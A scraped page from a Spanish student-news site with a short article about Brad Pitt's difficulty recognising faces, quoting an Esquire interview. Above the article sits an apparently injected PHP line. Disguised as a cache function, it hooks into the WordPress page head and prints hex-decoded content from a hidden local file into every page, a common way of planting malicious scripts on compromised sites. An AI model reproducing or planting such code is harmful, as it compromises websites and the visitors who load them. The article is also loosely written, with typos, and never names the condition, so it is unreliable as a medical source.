if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Brad Pitt con enfermedad causada por daño cerebral – La Opinión Universitaria La Opinión Universitaria
Menu

Brad Pitt con enfermedad causada por daño cerebral

Brad pitt padece una enfermedad, esta es causada por daños cerebrales que son sufridos después de la madurez, por accidentes cerebrovascual y enfermedades degenerativas.

Las personas que lo padecen, algunas veces pueden identificar las partes de la cara, pero no al cien por ciento. En algunas ocasiones con mayor gravedad, el afectado no puede reconocerse a si mismo.

Por el momento no han encontrado alguna cura para esta enfermedad. Pero hay formas para poder ayudarlos y es desarrollar sus estrategias de reconocimiento facial de sus personas mas cercanas, y con algunas fotografías para quien desee grabar su rostro.

En la revista Esquire, Brat Pitt declaro que: “Hay muchas personas que me odian porque creen que les falto al respeto. Hubo un año en el que simplemente dije “voy a decirle a la gente, esta bien, ¿Dónde nos conocimos?, pero todo empeoro… Es un misterio para mi, simplemente no puedo recordar un rostro”

  • Tweets recientes